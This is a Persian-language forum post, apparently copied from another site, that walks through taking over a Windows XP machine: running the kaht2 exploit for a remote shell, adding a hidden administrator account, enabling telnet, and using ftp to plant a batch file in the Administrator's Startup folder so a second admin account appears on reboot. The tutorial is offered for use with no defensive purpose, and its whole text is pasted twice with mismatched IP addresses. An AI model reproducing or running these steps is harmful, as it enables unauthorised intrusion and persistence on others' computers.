reza_pakraei
کاربر تازه وارد
- تاریخ عضویت
- 11 می 2005
- نوشتهها
- 20
- لایکها
- 0
سلام به متن زير دقت كنيد ابن متن از سايت far30.com گرفته شده است.
در این روش به شما نشان میدهیم که چطور می توان با یک سطح کاربری غیر admin یک کاربر جدید با سطح admin در xp ایجاد نمود:
ابتدابه قسمت start/run رفته و بنویسید cmd سپس در محیط ایجاد شده بنویسید ipconfig وip خود را جایی یادداشت کنید مثلا برای من 169.254.180.70 بود.سپس در notepad یک فایل با محتوای زیر ایجاد کنید:
net user saeed 1234 /add
net user localgroup administrators saeed /add
سپس آنرا با نام مثلا saeed.bat ذخیره کنید.حال در یک Cmd به exploit خود رفته و یک shell به صورت زیر ایجاد کنید
در اینجا من از kaht2 که یک نرم افزار exploitمی باشد استفاده کرده ام)
D:\exploit>kaht2 169.254.80.30 169.254.80.40
دقت شود که ip ایجاد شدخ در کلاس ip خودتان باشد.
حالا shell ایجاد میشود. در اینجا یک کاربر بصورت زیر ایجاد کنید:
c :\windows\system32>net user smart 1234 /add
c:\windows\system32>net user localgroup administrators smart /add
حالا سیستم telnet را با دستورا ت زیر راه می اندازیم:
c:\windows\system32> net start telnet
حالا یک cmd جدید باز کنید و بنویسید telnet 169.254.80.39 و enter کنید. حالا به سوال جواب yes بدهید.و در login بنویسید smart با رمز 1234
سپس دستور زیر را تایپ کنید:
D:\>cd document and setting\administrator\start menu\programs\startup
به این شاخه که رفتید بنویسید ftp و enter کنید حالا تایپ کنید :
ftp>open 169.254.180.70
البته شما ip خودتان را که اول گرفته را بزنیدوuser و password کاربری خودتان را که سطح admin نیز ندارد بزنید. سپس با دستور ls میتوانید ببینید که فایل saeed وجود دارد. سپس تایپ کنید:
ftp>get saeed.bat
حالا تایپ کنید:
ftp>close
ftp>bye
حالا اگر کامپیوتر خاموش وروشن شود یک کاربر جدید با نام saeed که سطح admin دارد ایجاد شده است.
در این روش به شما نشان میدهیم که چطور می توان با یک سطح کاربری غیر admin یک کاربر جدید با سطح admin در xp ایجاد نمود:
ابتدابه قسمت start/run رفته و بنویسید cmd سپس در محیط ایجاد شده بنویسید ipconfig وip خود را جایی یادداشت کنید مثلا برای من 169.254.180.70 بود.سپس در notepad یک فایل با محتوای زیر ایجاد کنید:
net user saeed 1234 /add
net user localgroup administrators saeed /add
سپس آنرا با نام مثلا saeed.bat ذخیره کنید.حال در یک Cmd به exploit خود رفته و یک shell به صورت زیر ایجاد کنید
در اینجا من از kaht2 که یک نرم افزار exploitمی باشد استفاده کرده ام)D:\exploit>kaht2 169.254.80.30 169.254.80.40
دقت شود که ip ایجاد شدخ در کلاس ip خودتان باشد.
حالا shell ایجاد میشود. در اینجا یک کاربر بصورت زیر ایجاد کنید:
c :\windows\system32>net user smart 1234 /add
c:\windows\system32>net user localgroup administrators smart /add
حالا سیستم telnet را با دستورا ت زیر راه می اندازیم:
c:\windows\system32> net start telnet
حالا یک cmd جدید باز کنید و بنویسید telnet 169.254.80.39 و enter کنید. حالا به سوال جواب yes بدهید.و در login بنویسید smart با رمز 1234
سپس دستور زیر را تایپ کنید:
D:\>cd document and setting\administrator\start menu\programs\startup
به این شاخه که رفتید بنویسید ftp و enter کنید حالا تایپ کنید :
ftp>open 169.254.180.70
البته شما ip خودتان را که اول گرفته را بزنیدوuser و password کاربری خودتان را که سطح admin نیز ندارد بزنید. سپس با دستور ls میتوانید ببینید که فایل saeed وجود دارد. سپس تایپ کنید:
ftp>get saeed.bat
حالا تایپ کنید:
ftp>close
ftp>bye
حالا اگر کامپیوتر خاموش وروشن شود یک کاربر جدید با نام saeed که سطح admin دارد ایجاد شده است.
